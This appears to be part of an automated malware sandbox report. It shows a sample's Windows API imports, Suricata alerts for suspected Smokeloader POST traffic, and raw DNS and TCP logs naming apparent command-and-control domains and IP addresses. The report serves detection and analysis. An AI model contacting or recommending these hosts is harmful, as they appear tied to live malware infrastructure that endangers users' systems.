                                                                                                                                                                                        USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                                                        KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        05/02/24-20:49:25.562996TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:29.611454TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:38.222924TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:33.652088TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:35.713703TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:30.529068TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:26.484537TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:27.548348TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:31.455151TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:39.138361TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:34.799212TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        05/02/24-20:49:37.305666TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        May 2, 2024 20:47:57.690700054 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.690728903 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:57.690793037 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.701436043 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.701458931 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:57.890803099 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:57.890863895 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.979834080 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.979866028 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:57.980077982 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:57.980145931 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:57.983741999 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:58.024121046 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:58.486073017 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:58.486129045 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:58.486150980 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:58.486164093 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:58.486198902 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:58.492477894 CEST49734443192.168.2.4104.21.79.229
                                                                                                                                                                                        May 2, 2024 20:47:58.492492914 CEST44349734104.21.79.229192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:25.341712952 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:25.562657118 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:25.562808990 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:25.562995911 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:25.563019991 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:25.783857107 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.257427931 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.258093119 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.258172989 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.259269953 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.263334990 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.481446981 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.484283924 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.484385967 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.484536886 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.484560013 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.705256939 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180330038 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180351973 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180466890 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.180681944 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.183002949 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.400893927 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.403151035 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.403222084 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.548347950 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.548413992 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.770255089 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.469897985 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.470249891 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.470312119 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.384404898 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.388956070 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.606779099 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:29.611124039 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:29.611211061 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.611454010 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.611469030 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.832420111 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.304878950 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.304923058 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.305033922 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.305475950 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.308456898 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.525476933 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.528825045 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.528892040 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.529067993 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.529092073 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.750344992 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.224658966 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.225027084 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.225100040 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.225140095 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.228127956 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.447959900 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.450436115 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.450510979 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.455151081 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.455168009 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.675467014 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375453949 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375847101 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375910997 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.388813019 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.393511057 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.609530926 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:33.614438057 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:33.614521980 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.652087927 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.652129889 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.872967958 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573210001 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573564053 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573663950 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.573909998 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.578109980 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.794158936 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.798652887 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.798793077 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.799211979 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.799297094 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.020517111 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490858078 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490885973 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490962982 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.491184950 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.493469000 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.711565971 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.713392973 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.713483095 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.935173988 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.407660007 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.408839941 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.408899069 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.081377983 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.085226059 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.302058935 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:37.305375099 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:37.305505991 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.305665970 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.305697918 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.525954008 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000391006 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000428915 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000608921 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.000945091 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.003226995 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.220349073 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.222711086 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.222778082 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.222923994 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.222948074 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.443471909 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.914377928 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.914916039 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.914973021 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.915002108 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.918111086 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:39.134912968 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:39.137850046 CEST8049755186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:39.137921095 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:39.138360977 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:39.138421059 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:39.359018087 CEST8049755186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:39.830506086 CEST8049755186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:39.830574036 CEST8049755186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:39.830651045 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:39.869959116 CEST4975580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:40.090651989 CEST8049755186.10.34.243192.168.2.4
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        May 2, 2024 20:47:57.588154078 CEST4999053192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:47:57.684519053 CEST53499901.1.1.1192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:47:58.498101950 CEST5746253192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:47:58.655678034 CEST53574621.1.1.1192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:19.573955059 CEST5168253192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:49:20.559111118 CEST5168253192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:49:21.575362921 CEST5168253192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:49:23.574848890 CEST5168253192.168.2.41.1.1.1
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST53516821.1.1.1192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST53516821.1.1.1192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST53516821.1.1.1192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST53516821.1.1.1192.168.2.4
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        May 2, 2024 20:47:57.588154078 CEST192.168.2.41.1.1.10x4232Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:47:58.498101950 CEST192.168.2.41.1.1.10x9ddStandard query (0)rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGhA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:19.573955059 CEST192.168.2.41.1.1.10xc23eStandard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:20.559111118 CEST192.168.2.41.1.1.10xc23eStandard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:21.575362921 CEST192.168.2.41.1.1.10xc23eStandard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:23.574848890 CEST192.168.2.41.1.1.10xc23eStandard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        May 2, 2024 20:47:57.684519053 CEST1.1.1.1192.168.2.40x4232No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:47:57.684519053 CEST1.1.1.1192.168.2.40x4232No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:47:58.655678034 CEST1.1.1.1192.168.2.40x9ddName error (3)rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGhnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.10.34.243A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org190.218.33.18A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.141.134.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org181.197.122.66A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org187.228.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.181.37.206A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.145.236.109A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649153948 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.10.34.243A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org190.218.33.18A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.141.134.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org181.197.122.66A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org187.228.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.181.37.206A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.145.236.109A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649199963 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.10.34.243A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org190.218.33.18A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.141.134.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org181.197.122.66A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org187.228.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.181.37.206A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.145.236.109A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649211884 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.10.34.243A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org190.218.33.18A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.141.134.164A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org181.197.122.66A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org187.228.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org189.181.37.206A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org186.145.236.109A (IP address)IN (0x0001)false
                                                                                                                                                                                        May 2, 2024 20:49:24.649255037 CEST1.1.1.1192.168.2.40xc23eNo error (0)cellc.org148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                        • 2no.co
                                                                                                                                                                                        • ynwsxoervaie.org
                                                                                                                                                                                          • cellc.org
